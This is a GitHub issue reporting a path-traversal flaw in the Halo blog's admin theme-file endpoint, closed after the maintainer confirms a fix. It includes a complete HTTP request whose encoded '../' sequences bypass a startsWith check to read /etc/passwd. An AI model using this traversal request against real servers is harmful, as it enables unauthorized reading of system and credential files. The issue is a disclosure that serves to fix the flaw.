Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

An Arbitrary File reading vulnerability in the backend(bypass the Path check) #420

Closed
5 tasks done
any-how opened this issue Dec 11, 2019 · 1 comment
Closed
5 tasks done
Assignees
Labels
kind/bug Categorizes issue or PR as related to a bug.

Comments

@any-how
Copy link

any-how commented Dec 11, 2019

I am sure I have checked


I want to apply

  • BUG feedback

In an interface that reads files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.
image
So I can read any file using the following message
image

GET /api/admin/themes/caicai_anatole/files/content?path=%2Froot%2F.halo%2Ftemplates%2Fthemes%2Fanatole%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F/passwd HTTP/1.1
Host: 100.101.61.13:8090
Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Referer: http://100.101.61.13:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

@any-how any-how changed the title An Arbitrary File reading in the backend(bypass the Path check) An Arbitrary File reading vulnerability in the backend(bypass the Path check) Dec 12, 2019
@JohnNiang JohnNiang added the kind/bug Categorizes issue or PR as related to a bug. label Dec 12, 2019
@JohnNiang JohnNiang self-assigned this Dec 12, 2019
@JohnNiang
Copy link
Member

I wrote this function inside incorrectly. And it had been fixed by d59877a.

JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
* refactor: attachment selection modal

Signed-off-by: Ryan Wang <i@ryanc.cc>

* feat: support view attachment detail

Signed-off-by: Ryan Wang <i@ryanc.cc>

* chore: remove AttachmentSelectDrawer.vue

Signed-off-by: Ryan Wang <i@ryanc.cc>

* chore: remove AttachmentDrawer.vue

Signed-off-by: Ryan Wang <i@ryanc.cc>

* perf: add selected icon

Signed-off-by: Ryan Wang <i@ryanc.cc>

* perf: add search form

Signed-off-by: Ryan Wang <i@ryanc.cc>

* perf: support upload file

Signed-off-by: Ryan Wang <i@ryanc.cc>

* refactor: attachment selection modal

Signed-off-by: Ryan Wang <i@ryanc.cc>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
kind/bug Categorizes issue or PR as related to a bug.
Projects
None yet
Development

No branches or pull requests

2 participants